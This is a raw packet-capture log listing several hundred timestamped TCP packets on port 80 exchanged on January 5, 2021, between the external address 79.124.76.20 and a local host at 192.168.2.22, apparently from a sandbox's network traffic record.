Jan 5, 2021 10:06:48.697058916 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.697156906 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.697298050 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.697321892 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.697422028 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.697499037 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.697608948 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.697751045 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.697854996 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.697973013 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.698123932 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.698230982 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.698378086 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.698493958 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.698575020 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.698692083 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.698813915 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.698935032 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.699012041 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.699135065 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.699146986 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.699157953 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.699232101 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.699256897 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.699382067 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.699476004 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.699553013 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.699624062 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.699672937 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.699748039 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.699817896 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.699856997 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.699933052 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.700056076 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.700104952 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.700185061 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.700303078 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.700393915 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.700479984 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.700489998 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.700591087 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.700623035 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.700743914 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.700794935 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.700898886 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.701121092 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.701147079 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.701175928 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.701301098 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.701354980 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.701379061 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.701612949 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.701636076 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.701778889 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.701781034 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.701807022 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.701828957 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.701994896 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.702059984 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.702234983 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.702271938 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.702461958 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.702488899 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.702666044 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.702696085 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.702922106 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.702945948 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.703138113 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.703170061 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.703388929 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.703413963 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.703636885 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.703660965 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.703814030 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.703836918 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.704020023 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.704056978 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.704278946 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.704315901 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.704509974 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.704540014 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.704772949 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.704791069 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.704802990 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.704807043 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.704822063 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.704866886 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.705003023 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.705060005 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.705152988 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.705244064 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.705300093 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.705358982 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.705519915 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.705547094 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.705662966 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.705709934 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.705738068 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.705806017 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.705945969 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.705981970 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.706027031 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.706144094 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.706180096 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.706247091 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.706386089 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.706410885 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.706496954 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.706578016 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.706614017 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.706671000 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.706839085 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.706865072 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.706934929 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.707065105 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.710908890 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.710975885 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.711072922 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.714240074 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.714451075 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.714478016 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.714751959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.714776993 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.714797974 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.714951038 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.714991093 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.715136051 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.715298891 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.715332031 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.715416908 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.715538025 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.716217041 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.716232061 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.716449976 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.718406916 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.718498945 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.718569040 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.718672991 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.718719006 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.718771935 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.718924999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.718949080 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.719012976 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.719074011 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.719218969 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.719264030 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.719290018 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.719378948 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.719422102 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.719497919 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.719615936 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.719677925 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.719913960 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.719940901 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.719988108 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.720101118 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.720134974 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.720263004 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.720341921 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.720376015 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.720421076 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.720535040 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.720571995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.720738888 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.720746040 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.720823050 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.720897913 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.721031904 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.721060038 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.721111059 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.721282959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.721318007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.721436024 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.721457005 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.721482038 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.721577883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.721611977 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.721784115 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.721817970 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.721910000 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.722008944 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.722049952 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.722124100 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.722147942 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.722196102 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.722213984 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.722353935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.722377062 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.722594976 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.722641945 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.722830057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.722856045 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.723035097 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.723062992 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.723263979 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.723295927 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.723494053 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.723589897 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.723701000 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.723732948 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.723855972 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.723978043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.724060059 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.724134922 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.724138975 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.724149942 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.724298954 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.724364996 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.724433899 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.724498034 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.724550009 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.724662066 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.724843025 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.724869013 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.724940062 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.725104094 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.725127935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.725178003 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.725188971 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.725337029 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.725382090 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.725449085 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.725578070 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.725629091 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.725737095 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.725795984 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.725857019 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.725908041 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.725980043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.726097107 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.726140976 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.726321936 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.726347923 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.726392984 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.726545095 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.726619005 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.726689100 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.726778984 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.726811886 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.726862907 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.727006912 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.727031946 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.727125883 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.727264881 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.727292061 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.727375031 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.727467060 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.727494955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.727549076 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.727695942 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.727721930 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.727829933 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.727922916 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.727946043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.728003025 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.728018045 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.728138924 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.728394985 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.728418112 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.728627920 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.728658915 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.728897095 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.728946924 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.729091883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.729114056 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.729266882 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.729302883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.729511023 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.729533911 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.729867935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.729903936 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.729980946 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.730014086 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.730181932 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.730211973 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.730485916 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.730513096 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.730691910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.730721951 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.730889082 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.730901003 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.730906010 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.731020927 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.731021881 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.731046915 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.731069088 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.731089115 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.731101990 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.731170893 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.731210947 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.731342077 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.731462955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.731544018 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.731702089 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.731823921 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.731899023 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.732012033 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.732279062 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.732300043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.732342958 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.732460976 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.732583046 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.732702017 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.732822895 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.732923985 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.732943058 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.732956886 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.733027935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.733099937 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.733155012 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.733222008 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.733283997 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.733355999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.733439922 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.733510017 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.733587980 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.733633995 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.733705997 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.733841896 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.733885050 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.733952045 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.734081984 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.734149933 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.734183073 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.734270096 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.734327078 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.734359980 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.734512091 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.734633923 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.734642029 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.734755993 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.734811068 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.734877110 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.734951973 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.735063076 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.735187054 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.735213995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.735367060 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.735409975 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.735435963 CET	80	49170	79.124.76.20	192.168.2.22
